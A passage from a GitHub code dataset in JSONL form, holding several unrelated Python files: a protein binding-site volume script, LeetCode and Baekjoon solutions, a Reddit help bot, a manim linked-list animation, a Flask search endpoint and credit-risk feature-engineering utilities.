.pdb\n \"\"\"\n\n if outfmt != 'maegz':\n raise ValueError('outfmt must be maegz')\n os.system('mv *.%s %s'%(outfmt,outdir))\n logdir = '%s/logs'%outdir\n logdir = logdir.replace('//','/')\n if not os.path.isdir(logdir):\n os.system('mkdir %s'%logdir)\n os.system('mv *.vis %s'%logdir)\n os.system('mv *.smap %s'%logdir)\n os.system('mv *.log %s'%logdir)\n\ndef _group_siteMap(sites,out,outdir):\n \"\"\"\n Group all volume sites from SiteMap into a single mae file\n sites:\n out:\n outdir:\n \"\"\"\n conc_sites = ''\n for site in sites:\n conc_sites = conc_sites + ' ' + site\n\n cmd = '%s/utilities/structcat -imae %s -omae %s'%(schrodinger_path,conc_sites,out)\n cmd = cmd.replace('//','/')\n print(cmd)\n os.system(cmd)\n try:\n aux = 'mv %s %s'%(out,outdir)\n os.system(aux)\n except:\n print('wrong outdir')\n\ndef _uncompress_maegz(inp):\n \"\"\"\n inp:\n \"\"\"\n out = inp.replace('.maegz','.mae')\n cmd = '%s/utilities/structcat -imae %s -omae %s'%(schrodinger_path,inp,out)\n cmd = cmd.replace('//','/')\n print(cmd)\n os.system(cmd)\n\ndef get_volumeOverlapMatrix(sites,out,max_processes=4):\n \"\"\"\n Generate pairwise volume overlap matrix\n sites: 'str'. single file containing multiple SitMap files\n \"\"\"\n cmd = '%s/run volume_cluster.py -j %s -HOST localhost:%d -sc -r 2 %s'%(schrodinger_path,out,max_processes,sites)\n cmd = cmd.replace('//','/')\n print(cmd)\n p = subprocess.Popen(cmd, shell=True)\n p.wait()\n if p.wait() != 0:\n print(\"There was an error\")\n \n\ndef _clean_volumeMatrix(out,coutdir):\n \"\"\"\n Move the VolumeMatrix output to an specified directory\n out: 'str'\n outdir: 'str'. Output directory\n \"\"\"\n if not os.path.isdir(coutdir):\n os.system('mkdir %s'%coutdir)\n\n os.system('mv *.csv %s'%(coutdir))\n logdir = '%s/logs/'%coutdir\n logdir = logdir.replace('//','/')\n if not os.path.isdir(logdir):\n os.system('mkdir %s'%logdir)\n os.system('mv *.mae %s'%logdir)\n os.system('mv *.log %s'%logdir)\n\n\n\nif __name__ == '__main__':\n arg = parserfunc()\n inpdir = arg.maedir\n outdir = arg.outdir\n\n # create output directory\n if not os.path.isdir('%s/siteMap'%outdir):\n os.system('mkdir %s/siteMap'%outdir)\n\n # Compute the volume of each target specific binding site\n print(\"\\n-------------RUNNING SITEMAP----------------\\n\")\n TARGs = glob.glob('%s/*_prep.mae'%(inpdir))\n siteMap(maes=TARGs,asl = \"(res.num 145) AND ((atom.ptype \\' HB2 \\'))\",delimiter='_prep',outfmt='mae',max_processes=30)\n _clean_siteMap(outdir='%s/siteMap'%(outdir))\n sites = glob.glob('%s/siteMap/*_out.maegz'%outdir)\n _group_siteMap(sites=sites,out='Mpro_sites.maegz',outdir='%s/siteMap/'%outdir)\n _uncompress_maegz(inp='%s/siteMap/Mpro_sites.maegz'%outdir)\n\n # Find targets without binding site arround the specified atom\n print(\"\\n--------------CHECK STEP--------------------\\n\")\n print(\"These targets do not have the binding site around the specified atom. Please, remove them for further analysis:\")\n TARGs_IDs = [os.path.basename(TARG).split('_')[1] for TARG in TARGs]\n sites_IDs = [os.path.basename(site).split('_')[1] for site in sites]\n print(set(TARGs_IDs)-set(sites_IDs))\n\n # Get the volume overlapping matrix of the target sites\n print(\"\\n-----------VOLUME OVERLAPPING MATRIX----------\\n\")\n get_volumeOverlapMatrix(sites='%s/siteMap/Mpro_sites.maegz'%(outdir),out='Mpro_volumeMatrix',max_processes=4)\n _clean_volumeMatrix(out='Mpro_volumeMatrix',coutdir='%s/volumeMatrix/'%(outdir))\n\n\n","repo_name":"juliavilmor/Mpro","sub_path":"scripts/targetanalysis/volume_sitemap.py","file_name":"volume_sitemap.py","file_ext":"py","file_size_in_byte":5787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"5300891552","text":"\"\"\"\nGiven an integer array nums, return true if any value appears at least twice in the array, and return false if every element is distinct.\n\n\n\nExample 1:\n\nInput: nums = [1,2,3,1]\nOutput: true\nExample 2:\n\nInput: nums = [1,2,3,4]\nOutput: false\nExample 3:\n\nInput: nums = [1,1,1,3,3,4,3,2,4,2]\nOutput: true\n\n\nConstraints:\n\n1 <= nums.length <= 105\n-109 <= nums[i] <= 109\n\"\"\"\nfrom typing import List\n\n\"\"\"\nSolution:\n\nfrom the concept of set in python\n\nset have unique elements\n\nso convert list to set and check both length\n\nif the length is same then no duplicate elements\n\n\n\"\"\"\n\n\nclass Solution:\n def containsDuplicate(self, nums: List[int]) -> bool:\n return len(nums) != len(set(nums))\n\n\nif __name__ == '__main__':\n n = [1, 2, 3, 1]\n n2 = [1, 2, 3, 4]\n n3 = [1, 1, 1, 3, 3, 4, 3, 2, 4, 2]\n s = Solution()\n print(s.containsDuplicate(n))\n print(s.containsDuplicate(n2))\n print(s.containsDuplicate(n3))\n","repo_name":"mihirh19/Python","sub_path":"LeetCodeSolution/0217.Contains_Duplicate.py","file_name":"0217.Contains_Duplicate.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"29368810985","text":"import praw\nimport os\n\nfrom enum import Enum\nfrom constants import *\n\nclass Reply(Enum):\n BASE_REPLY = 1\n\nclass AnkiHelpBot:\n responses: dict[Reply, str]\n reddit: praw.Reddit\n\n def __init__(self) -> None:\n self.responses = self.loadReplies()\n self.reddit = self.connect()\n\n\n def main(self):\n subreddit = self.reddit.subreddit(CONST_SUBREDDIT)\n for submission in subreddit.stream.submissions(skip_existing=True):\n self.process_submission(submission)\n\n def process_submission(self, submission):\n print(self.responses[Reply.BASE_REPLY])\n if submission.link_flair_text == \"Question\":\n submission.reply(body=self.responses[Reply.BASE_REPLY])\n\n\n def loadReplies(self) -> dict[Reply, str]:\n response: dict[Reply, str] = {}\n\n with open('replies/baseReply.md', 'r') as baseReply:\n baseReplyText = baseReply.read()\n response[Reply.BASE_REPLY] = baseReplyText\n \n return response\n\n def connect(self) -> praw.Reddit:\n return praw.Reddit(\n client_id=os.getenv(CONST_CLIENT_ID_ENV),\n client_secret=os.getenv(CONST_CLIENT_SECRET_ENV),\n redirect_uri=\"https://github.com/LanguageLatte/public\",\n password=os.getenv(CONST_PASSWORD_ENV),\n user_agent=CONST_USER_AGENT,\n username=CONST_USERNAME,\n )\n\nif __name__ == \"__main__\":\n ankiHelpBot = AnkiHelpBot()\n ankiHelpBot.main()","repo_name":"LanguageLatte/public","sub_path":"AnkiHelpBot/AnkiHelpBot.py","file_name":"AnkiHelpBot.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"67"} +{"seq_id":"70639444375","text":"'''\r\n1로 만들기\r\nhttps://www.acmicpc.net/problem/1463\r\n'''\r\nN = int(input())\r\n\r\ndp = [0] * (N+4) # 숫자 N일때의 답을 해당 인덱스에 삽입\r\ndp[2] = 1\r\ndp[3] = 1\r\ndp[4] = 2\r\nfor n in range(5, N+1): # 5부터 bottom-up으로 dp 계산\r\n op_a = 0 # 연산 1 플래그\r\n if n % 3 == 0:\r\n op_a = 1\r\n\r\n op_b = 0 # 연산 2 플래그\r\n if n % 2 == 0:\r\n op_b = 1\r\n\r\n op_flag = (op_a, op_b, 1) # 연산 1, 2, 3 플래그\r\n if op_flag == (1, 1, 1):\r\n dp[n] = min(dp[n//3] + 1, dp[n//2] + 1, dp[n-1] + 1)\r\n elif op_flag == (1, 0, 1):\r\n dp[n] = min(dp[n//3] + 1, dp[n-1] + 1)\r\n elif op_flag == (0, 1, 1):\r\n dp[n] = min(dp[n//2] + 1, dp[n-1] + 1)\r\n elif op_flag == (0, 0, 1):\r\n dp[n] = dp[n-1] + 1\r\n\r\nprint(dp[N])\r\n\r\n\r\n\r\n###\r\n# 테스트케이스 참고(https://www.acmicpc.net/board/view/49959)\r\n\r\n''' DFS 연습\r\ndef dfs(n):\r\n global answer, cnt\r\n\r\n if n < 1:\r\n return\r\n elif n == 1:\r\n answer = min(cnt, answer)\r\n\r\n return\r\n else:\r\n for o in op:\r\n if o == 'a' and n % 3 == 0:\r\n cnt += 1\r\n dfs(n // 3)\r\n cnt -= 1\r\n elif o == 'b' and n % 2 == 0:\r\n cnt += 1\r\n dfs(n // 2)\r\n cnt -= 1\r\n else:\r\n cnt += 1\r\n dfs(n - 1)\r\n cnt -= 1\r\n\r\n\r\nN = int(input())\r\n\r\ncnt = 0\r\nanswer = sys.maxsize\r\nop = ['a', 'b', 'c']\r\ndfs(N)\r\n\r\nprint(answer)\r\n'''\r\n","repo_name":"buyeolim/ps_prac","sub_path":"BOJ/python3/1463.py","file_name":"1463.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"20271338661","text":"# See 'Leetcode 206. Reverse Linked List' for practice\n\nfrom manim import *\n\nfrom src.list_utilities.LinkedList import LinkedList\nfrom src.list_utilities.Node import Node, NoneNode\n\n\nclass ReverseList(Scene):\n def construct(self):\n title = MarkupText(\"Reverse linked list\", font_size=45).shift(UP * 3)\n self.add(title)\n\n self.show_task(title)\n self.show_reverse_list_code(title)\n\n orig_nodes = [Node(str(j)) for j in range(1, 4)]\n orig_list = LinkedList(nodes=orig_nodes)\n self.play(FadeIn(orig_list.visual_list))\n self.wait(1)\n\n none_start = NoneNode()\n none_start.set_next(orig_list.head)\n none_end = NoneNode()\n orig_list.tail.set_next(none_end)\n self.show_none_start_end(orig_list, none_start, none_end)\n\n self.reverse_list(none_start, orig_list.head)\n self.play(FadeOut(none_start.vn_arrows.vnode.group),\n FadeOut(orig_list.head.vn_arrows.left_arrow))\n self.wait(2)\n\n def show_task(self, title: MarkupText) -> None:\n orig_nodes = [Node(str(j)) for j in range(1, 4)]\n orig_list = LinkedList(nodes=orig_nodes)\n\n rev_nodes = [Node(str(j)) for j in range(3, 0, -1)]\n rev_list = LinkedList(nodes=rev_nodes)\n\n down_arrow = MathTex(r\"\\Downarrow\", color=WHITE)\n result = VGroup(orig_list.visual_list, down_arrow, rev_list.visual_list)\\\n .arrange(DOWN, buff=0.5).next_to(title, DOWN * 5)\n self.play(FadeIn(result, run_time=3))\n self.wait(2)\n self.play(FadeOut(result))\n\n def show_reverse_list_code(self, title: MarkupText) -> None:\n code = '''\n prev, cur = None, head\n while cur:\n next_node = cur.next\n cur.next = prev\n prev, cur = cur, next_node\n return prev\n '''\n rendered_code = Code(code=code, tab_width=4, insert_line_no=False,\n language=\"Python\", font=\"Monospace\", font_size=14)\\\n .next_to(title, RIGHT * 2)\n self.play(Create(rendered_code))\n\n def show_none_start_end(self, list_: LinkedList, start: Node, end: Node) -> None:\n end.vn_arrows.group.next_to(list_.visual_list, RIGHT)\n start.vn_arrows.group.next_to(list_.visual_list, LEFT)\n self.play(FadeIn(end.vn_arrows.group, run_time=2))\n\n start.vn_arrows.remove_arrow()\n self.play(FadeIn(start.vn_arrows.group, run_time=2))\n self.wait(1)\n\n def reverse_list(self, none_node: Node, head: Node) -> Node:\n prev, cur = none_node, head\n tp = TextPointers(prev, cur, self)\n self.wait(0.8)\n\n while not cur.is_none:\n next_node = cur.next\n move_arrow(prev, cur, self)\n cur.next = prev\n tp.move_prev_cur()\n prev, cur = cur, next_node\n tp.update_next(cur)\n self.wait(0.8)\n\n self.play(FadeOut(tp.cur, cur.vn_arrows.group), tp.get_prev_to_cur_transform())\n self.wait(0.5)\n return prev\n\n\ndef move_arrow(prev: Node, cur: Node, scene: Scene) -> None:\n scene.wait(0.8)\n prev.vn_arrows.flip_arrow()\n scene.play(CounterclockwiseTransform(cur.vn_arrows.right_arrow, prev.vn_arrows.right_arrow))\n cur.vn_arrows.set_right_to_left_arrow()\n cur.vn_arrows.set_right_arrow()\n\n\nclass TextPointers:\n def __init__(self, prev: Node, cur: Node, scene: Scene) -> None:\n self.__font_size = 18\n self.__prev = Text(\"prev\", font_size=self.__font_size)\n self.__cur = Text(\"cur\", font_size=self.__font_size)\n self.__next = Text(\"next\", font_size=self.__font_size)\n self.scene = scene\n\n self.__prev.next_to(prev.vn_arrows.vnode.group, DOWN)\n self.__cur.next_to(cur.vn_arrows.vnode.group, DOWN)\n if cur.next:\n self.__next.next_to(cur.next.vn_arrows.vnode.group, DOWN)\n self.scene.play(FadeIn(self.__prev, self.__cur))\n\n @property\n def cur(self) -> Text:\n return self.__cur\n\n def move_prev_cur(self) -> None:\n self.__prev.generate_target()\n self.__prev.target.move_to(self.__cur)\n\n self.__cur.generate_target()\n self.__cur.target.move_to(self.__next)\n\n self.scene.play(MoveToTarget(self.__prev), MoveToTarget(self.__cur))\n self.scene.wait(1)\n\n def update_next(self, cur: Node) -> None:\n if cur.next:\n self.__next.next_to(cur.next.vn_arrows.vnode.group, DOWN)\n\n def get_prev_to_cur_transform(self) -> Transform:\n head_text = Text(\"head\", font_size=self.__font_size).shift(self.__prev.get_center())\n return Transform(self.__prev, head_text)\n","repo_name":"andreysmykov/algorithms_animation","sub_path":"src/reverse_linked_list/reverse_list.py","file_name":"reverse_list.py","file_ext":"py","file_size_in_byte":4646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"25144537282","text":"import app\nimport logging\n\nfrom flask import jsonify\nfrom flask_restplus import Resource\nfrom .models import Search\n\nLOG = logging.getLogger(__name__)\napi = Search.api \n\n@api.route('//')\nclass Search(Resource):\n @api.doc(\"search\")\n def get(self,c_type, tag):\n result = []\n if c_type == \"company\":\n search_resp = app.App.mongodb.db.company.find( { '$text': { '$search': tag } } ).sort('_id')\n \n elif c_type == \"customer\":\n search_resp = app.App.mongodb.db.customer.find( { '$text': { '$search': tag } } ).sort('_id')\n \n for doc in search_resp:\n result.append(doc)\n\n return jsonify(result)","repo_name":"venkaiaha/Sree-app-flask","sub_path":"app/api/search/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3329038158","text":"#Input de dados\nd = float(input(\"Digite a distância percorrida pelo usuário(km):\"))\nt = int(input(\"Digite o número de dias do aluguel:\"))\n#Dados armazenados\nP = 60\np = 0.15\n#Cálculo do pagamento\nV = (P*t) + (p*d)\n#Output\nprint(\"Valor a pagar: R$ %5.2f\" % V)","repo_name":"axelife2021/Python","sub_path":"Capítulo 3/ex3.14.py","file_name":"ex3.14.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13264873269","text":"import pandas as pd\nfrom sklearn.feature_selection import RFE\nimport copy\nimport numpy as np\nimport warnings\nimport numpy as np\nfrom sklearn.impute import SimpleImputer\nimport matplotlib.pyplot as plt\nimport yaml\n\n\ndef add_binary_where_the_nan_was(table, column):\n \"\"\"takes the table and next to each columnputs information whether there was a nan\"\"\"\n table[f'bool_nan_{column}'] = table[column].isna()\n return table\n\n\ndef get_rid_of_outliers(table, column):\n up, low = np.percentile(table[column], [1, 99])\n y = np.clip(table[column], up, low)\n # pd.Series(y).hist(bins=30)\n table = table.drop(columns=[column])\n table[f'no_outliers_{column}'] = pd.Series(y)\n return table\n\n\ndef WoE_for_categorical_values(table, column, ret_woe=False):\n \"\"\"\n takes a table, with a categorical value in columns and returns WOE and IV for that variable\n \"\"\"\n\n different_values = table[column].unique().shape[0]\n list_of_bads = [0] * different_values # in each element of a list it contains woe for a corresponding interval\n list_of_goods = [0] * different_values\n for i in range(len(table[str(column)])): # iterate over every sample\n # print(i)\n for j in range(different_values): # how many separate values are there to deal with\n if table[column][i] == table[column].unique()[j] and table['target'][i] == 1: # default is an event here\n list_of_bads[j] += 1\n elif table[column][i] == table[column].unique()[j] and table['target'][i] == 0:\n list_of_goods[j] += 1\n\n total_bads = table.target.sum()\n total_goods = len(table.target) - total_bads\n distr_goods = []\n distr_bads = []\n WoE = []\n\n for i in range(len(list_of_goods)):\n distr_goods.append(list_of_goods[i] / total_goods)\n distr_bads.append(list_of_bads[i] / total_bads)\n\n # check whether there are no groups with 0 counts for good or bad - if there are drop the columns with that variable\n # all together\n flag = False\n if 0 in distr_goods or 0 in distr_bads:\n print(\"In at least one of the bins there is either no goods or bads distribution. Dropping that variable\")\n flag = True\n\n for i in range(len(list_of_goods)):\n WoE.append(np.log(distr_goods[i] / distr_bads[i]) * 100)\n\n # Information Value of the whole characteristic\n distr_bads_nans = table['target'][table[column].isna()].sum()/total_bads\n # how many is nan and is not default\n distr_goods_nans = (table['target'][table[column].isna()].shape[0] - \\\n table['target'][table[column].isna()].sum())/total_goods\n WoE_nan = np.log(distr_goods_nans / distr_bads_nans) * 100\n WoE = WoE.insert(0, WoE_nan) # inserting the value correspinding to NaNs in the first place\n\n # Information Value of the whole characteristic\n differences = [distr_goods[i] - distr_bads[i] for i in range(len(distr_goods))]\n differences.insert(0, distr_goods_nans-distr_bads_nans)\n IV = np.dot(differences, np.transpose(WoE))\n\n if ret_woe and not flag:\n return WoE, IV\n elif not ret_woe and not flag:\n return IV\n elif flag:\n return table.drop(columns=[column])\n# consider correlation for all continuous data\n\n\ndef drop_columns_with_many_nans(table, threshold=0.2):\n \"\"\"drops columns that contain over 20% of nan values\"\"\"\n for col in table.columns:\n if table[col].isna().sum() >= threshold * table[col].shape[0]:\n table = table.drop(columns=[col])\n return table\n\n\ndef woe_and_iv_continuous_data(table, column, number_of_bins, ret_woe=False):\n \"\"\"assumes that target is provided in column 'target'\n 1 - event, ie default\n 0 - no default\n returns bins, woe - tuples, iv - scalar\n \"\"\"\n\n bins = pd.qcut(table[str(column)], number_of_bins, retbins=True)[1]\n # bins = pd.cut(table[str(column)], number_of_bins, retbins=True)[1]\n bins[-1] += 1 # to include all points\n list_of_bads = [0] * number_of_bins # in each element of a list it contains woe for a corresponding interval\n list_of_goods = [0] * number_of_bins\n for i in range(len(table[str(column)])):\n for j in range(number_of_bins):\n if bins[j] <= table[column][i] < bins[j+1] and table['target'][i] == 1: # default is an event here\n list_of_bads[j] += 1\n elif bins[j] <= table[column][i] < bins[j+1] and table['target'][i] == 0:\n list_of_goods[j] += 1\n\n\n # WoE = ln(distr_goods / distr_bads) * 100\n\n total_bads = table.target.sum() # bad = default\n total_goods = len(table.target) - total_bads\n distr_goods = []\n distr_bads = []\n WoE = []\n\n for i in range(len(list_of_goods)):\n distr_goods.append(list_of_goods[i] / total_goods)\n distr_bads.append(list_of_bads[i] / total_bads)\n\n # check whether there are no groups with 0 counts for good or bad\n\n if 0 in distr_goods or 0 in distr_bads:\n warnings.warn(\"In at least one of the bins there is either no goods or bads distribution. Check the binning\")\n exit()\n\n for i in range(len(list_of_goods)):\n WoE.append(np.log(distr_goods[i] / distr_bads[i]) * 100)\n\n # group also nans\n # how many is nan and is default\n distr_bads_nans = table['target'][table[column].isna()].sum()/total_bads\n # how many is nan and is not default\n distr_goods_nans = (table['target'][table[column].isna()].shape[0] - \\\n table['target'][table[column].isna()].sum())/total_goods\n # WoE_nan = np.log(distr_goods_nans / distr_bads_nans) * 100\n # WoE = WoE.insert(0, WoE_nan) # inserting the value correspinding to NaNs in the first place\n\n # Information Value of the whole characteristic\n differences = [distr_goods[i] - distr_bads[i] for i in range(len(distr_goods))]\n # differences.insert(0, distr_goods_nans-distr_bads_nans)\n IV = np.dot(differences, np.transpose(WoE))\n\n if ret_woe:\n return bins, WoE, IV\n else:\n return IV/100\n\n\ndef input_missing_values(table, column, median=True, mode=False):\n if median:\n imp_mean = SimpleImputer(missing_values=np.nan, strategy='median')\n elif mode:\n imp_mean = SimpleImputer(missing_values=np.nan, strategy='most_frequent')\n\n imp_mean.fit(table[column].values.reshape(-1, 1))\n table[column] = imp_mean.transform(table[column].values.reshape(-1, 1))\n return table\n\n\ndef correlation(dataset, threshold=0.6):\n # deals only with numeric data, float64 and int64, so here the values\n\n col_corr = set() # Set of all the names of deleted columns\n corr_matrix = dataset.corr()\n for i in range(len(corr_matrix.columns)):\n for j in range(i):\n if (corr_matrix.iloc[i, j] >= threshold) and (corr_matrix.columns[j] not in col_corr):\n colname = corr_matrix.columns[i] # getting the name of column\n col_corr.add(colname)\n if colname in dataset.columns:\n del dataset[colname] # deleting the column from the dataset\n print(col_corr)\n return dataset\n\n\ndef exclude_data_few_unique_values(dataset):\n \"\"\"drops columns that have either 0 distinct values (NANS) or only 1 distinct value\"\"\"\n col_to_drop = []\n\n for column in dataset.columns:\n if dataset[column].nunique() == 1 or dataset[column].nunique() == 0:\n col_to_drop.append(column)\n\n for column in col_to_drop:\n dataset = dataset.drop(columns=column)\n\n return dataset\n\n\ndef split_dataset(table):\n \"\"\"categorical features object,\n numerical - float64\n ordinal - int64, the distinction between categorical and ordinal is to belooked into\"\"\"\n table_categorical = table.select_dtypes('object')\n table_numerical = table.select_dtypes('float64')\n table_ordinal = table.select_dtypes('int64')\n return table_numerical, table_categorical, table_ordinal\n\n\ndef bin_dataset(table, column):\n \"\"\" bins numerical value\"\"\"\n if column is not 'target':\n return pd.qcut(table[column], 4)\n\n\ndef drop_duplicated_ones_and_values_leaking_data_from_the_future(table):\n list_to_drop = ['id', 'member_id', 'url', 'emp_title', 'issue_d', 'funded_amnt', 'funded_amnt_inv',\n 'sub_grade', 'int_rate', 'addr_state', 'out_prncp', 'out_prncp_inv', 'total_pymnt',\n 'total_pymnt_inv', 'total_rec_prncp', 'total_rec_int', 'total_rec_late_fee', 'recoveries',\n 'collection_recovery_fee', 'last_pymnt_d', 'last_pymnt_amnt', 'zip_code',\n 'earliest_cr_line', 'next_pymnt_d', 'last_credit_pull_d', 'disbursement_method', 'delinq_amnt',\n 'open_rv_24m']\n\n for column in list_to_drop:\n try: # as some of these columns might already have been dropped\n table = table.drop(columns=column)\n except:\n KeyError\n return table\n\n\ndef look_at_value_distribution(table, columns):\n \"\"\"for later stage of analysis, to manually exclude data that has very few examples of some values\"\"\"\n print(table[columns].value_counts())\n\n\ndef fill_nans(table, column): # only after values with too many nans were excluded\n return table[column].fillna(\"MISSING\")\n\n\ndef calculate_woe_iv(dataset, feature):\n lst = []\n for i in range(dataset[feature].nunique()):\n val = list(dataset[feature].unique())[i]\n lst.append({\n 'Value': val,\n 'All': dataset[dataset[feature] == val].count()[feature],\n 'Good': dataset[(dataset[feature] == val) & (dataset['target'] == 0)].count()[feature],\n 'Bad': dataset[(dataset[feature] == val) & (dataset['target'] == 1)].count()[feature]\n })\n\n dset = pd.DataFrame(lst)\n dset['Distr_Good'] = dset['Good'] / dset['Good'].sum()\n dset['Distr_Bad'] = dset['Bad'] / dset['Bad'].sum()\n dset['WoE'] = np.log(dset['Distr_Good'] / dset['Distr_Bad'])\n dset = dset.replace({'WoE': {np.inf: 0, -np.inf: 0}})\n dset['IV'] = (dset['Distr_Good'] - dset['Distr_Bad']) * dset['WoE']\n iv = dset['IV'].sum()\n\n dset = dset.sort_values(by='WoE')\n\n return dset, iv\n\n\ndef conc_tables(t1, t2, t3): # concatenates tables\n return pd.concat([t1, t2, t3])\n\n\n\ndef std_test_as_train(X_train, X_test):\n from sklearn.preprocessing import StandardScaler\n\n for col in X_train.columns:\n scaler = StandardScaler()\n scaler.fit(X_train[col].to_numpy().reshape(-1, 1))\n X_train[col] = scaler.transform(X_train[col].to_numpy().reshape(-1, 1))\n X_test[col] = scaler.transform(X_test[col].to_numpy().reshape(-1, 1))\n return X_train, X_test\n\n\ndef stack(X_train, y_train, X_test, y_test):\n from sklearn.linear_model import LogisticRegression\n from vecstack import stacking\n from sklearn import svm\n import xgboost as xgb\n from sklearn.metrics import roc_auc_score, classification_report, f1_score\n\n models = [LogisticRegression(), svm.SVC(), xgb.XGBClassifier(n_jobs=-1)]\n\n S_train, S_test = stacking(models, X_train, y_train, X_test, regression=False, verbose=2)\n\n model = xgb.XGBClassifier(seed=0, n_jobs=-1, learning_rate=0.1,n_estimators=100, max_depth=3)\n\n # Fit 2-nd level model\n model = model.fit(S_train, y_train)\n\n # Predict\n y_pred = model.predict(S_test)\n\n # Final prediction score\n print('Final prediction score: [%.8f]' % f1_score(y_test, y_pred))\n print(classification_report(y_test, y_pred))\n print(roc_auc_score(y_test, y_pred))\n\n\ndef stack_regression(X_train, y_train, X_test, y_test):\n from sklearn.linear_model import LinearRegression\n from vecstack import stacking\n from sklearn import linear_model\n import xgboost as xgb\n from sklearn.metrics import mean_squared_error, mean_absolute_error\n\n models = [linear_model.SGDRegressor(max_iter=1000, tol=1e-3), LinearRegression(), xgb.XGBRegressor(n_jobs=-1)]\n\n S_train, S_test = stacking(models, X_train, y_train, X_test, regression=False, verbose=2)\n\n model = xgb.XGBRegressor(seed=0, n_jobs=-1, learning_rate=0.1,n_estimators=100, max_depth=3)\n\n # Fit 2-nd level model\n model = model.fit(S_train, y_train)\n\n # Predict\n y_pred = model.predict(S_test)\n\n\n print(mean_squared_error(y_test, y_pred))\n\n\ndef upsample_data(X_train, y_train):\n\n from imblearn.over_sampling import SMOTE\n sm = SMOTE(random_state=42)\n X_res, y_res = sm.fit_resample(X_train, y_train)\n return X_res, y_res\n\n\n\"\"\"for later\"\"\"\ndef bayes_optim(X_train, X_test, y_train, y_test):\n\n from bayes_opt import BayesianOptimization\n from sklearn.ensemble import RandomForestClassifier\n from sklearn.model_selection import cross_val_score\n\n def bayesian_optimization(X_train, X_test, y_train, y_test, function, parameters):\n n_iterations = 10\n gp_params = {\"alpha\": 1e-4}\n BO = BayesianOptimization(function, parameters)\n BO.maximize(n_iter=n_iterations, **gp_params)\n\n return BO.ma\n\n\n def rfc_optimization(cv_splits):\n def function(n_estimators, max_depth, min_samples_split):\n return cross_val_score(\n RandomForestClassifier(\n n_estimators=int(max(n_estimators, 0)),\n max_depth=int(max(max_depth, 1)),\n min_samples_split=int(max(min_samples_split, 2)),\n n_jobs=-1,\n random_state=42,\n class_weight=\"balanced\"),\n X=X_train,\n y=y_train,\n cv=cv_splits,\n scoring=\"f1_macro\",\n n_jobs=-1).mean()\n\n parameters = {\"n_estimators\": (10, 1000),\n \"max_depth\": (1, 150),\n \"min_samples_split\": (2, 10)}\n\n return function, parameters\n\n # Train model\n def train(X_train, y_train, X_test, y_test, function, parameters):\n cv_splits = 4\n\n best_solution = bayesian_optimization(X_train, y_train, X_test, y_test, function, parameters)\n params = best_solution[\"params\"]\n\n model = RandomForestClassifier(\n n_estimators=int(max(params[\"n_estimators\"], 0)),\n max_depth=int(max(params[\"max_depth\"], 1)),\n min_samples_split=int(max(params[\"min_samples_split\"], 2)),\n n_jobs=-1,\n random_state=42,\n class_weight=\"balanced\")\n\n model.fit(X_train, y_train)\n\n return model\n\n function, parameters = rfc_optimization(10)\n print(train(X_train, y_train, X_test, y_test, function, parameters))\n\n\ndef encode_ordinal_category_encoders(table):\n import category_encoders\n for col in table.columns:\n if str(col)[:7] != 'encoded':\n encode = category_encoders.ordinal.OrdinalEncoder()\n encode.fit(table[col])\n table[f'encoded_ordinal{col}'] = encode.transform(table[col])\n return table\n\n\ndef encode_ordinal_sklearn(table, col):\n from sklearn.preprocessing import OrdinalEncoder\n enc = OrdinalEncoder()\n enc.fit(table[col].values.reshape(-1, 1))\n table[f'ordinal_encoded_{col}'] = enc.transform(table[col].values.reshape(-1, 1))\n return table\n\n\ndef encode_categorical_TargetEncoder(table, y):\n import category_encoders\n for col in table.columns:\n if str(col)[:7] != 'encoded':\n encode = category_encoders.target_encoder.TargetEncoder()\n encode.fit(table[col], y)\n table[f'encoded_target{col}'] = encode.transform(table[col])\n return table\n\n\ndef drop_cat_not_encoded(table):\n \"\"\"drops non encoded categorical columns\"\"\"\n for col in table.columns:\n if str(col)[:7] != 'encoded':\n table = table.drop(columns=[col])\n return table\n\n\ndef fit_xgboost(X, y, upsample=True):\n from sklearn.metrics import roc_auc_score, classification_report, f1_score\n import xgboost as xgb\n\n model = xgb.XGBClassifier(seed=0, n_jobs=-1, learning_rate=0.1,\n n_estimators=10, max_depth=5)\n\n # Fit 2-nd level model\n if upsample:\n X_res, y_res = upsample_data(X, y)\n X_train, X_test, y_train, y_test = train_test_split(X_res, y_res)\n model = model.fit(X_train, y_train)\n else:\n X_train, X_test, y_train, y_test = train_test_split(X, y)\n model = model.fit(X_train, y_train)\n\n\n # Predict\n y_pred = model.predict(X_test)\n print('f1:\\t\\n', f1_score(y_test, y_pred))\n print('roc_auc_score:\\t\\n', roc_auc_score(y_test, y_pred))\n print(classification_report(y_test, y_pred))\n return model\n\n\ndef date_feature(date):\n \"\"\"number of month, day of week, vacation, assuming US vacations\"\"\"\n from dateutil import parser\n import holidays\n us_holidays = holidays.UnitedStates()\n datetime_obj = parser.parse(date)\n weekday = datetime_obj.weekday() # 0 is monday\n month = datetime_obj.month\n year = datetime_obj.year\n is_holiday = datetime_obj in us_holidays or weekday==6 or weekday==5 # includes weekends as holidays\n return weekday, month, year, int(is_holiday)\n\n\ndef mean_encoding(table, column, target, drop=False):\n \"\"\"assumes no nans\"\"\"\n \"\"\"assumes target is a column in table\"\"\"\n table[f'mean_encoded_{column}'] = table[column].map(table.iloc[table.index].groupby(column)[target].mean())\n if drop:\n table = table.drop(columns=[column])\n return table\n\n\ndef frequency_encode(table, column, drop=False):\n \"\"\"assumes no nans\"\"\"\n encoding = table.groupby(column).size()\n encoding = encoding / table.shape[0]\n table[f'freq_enc_{column}'] = table[column].map(encoding)\n if drop:\n table = table.drop(columns=[column])\n return table\n\n\ndef kfold_mean_encoding(table, column, target, nfolds=5):\n\n from sklearn.model_selection import KFold\n\n skf = KFold(nfolds, shuffle=False)\n\n for tr_ind, 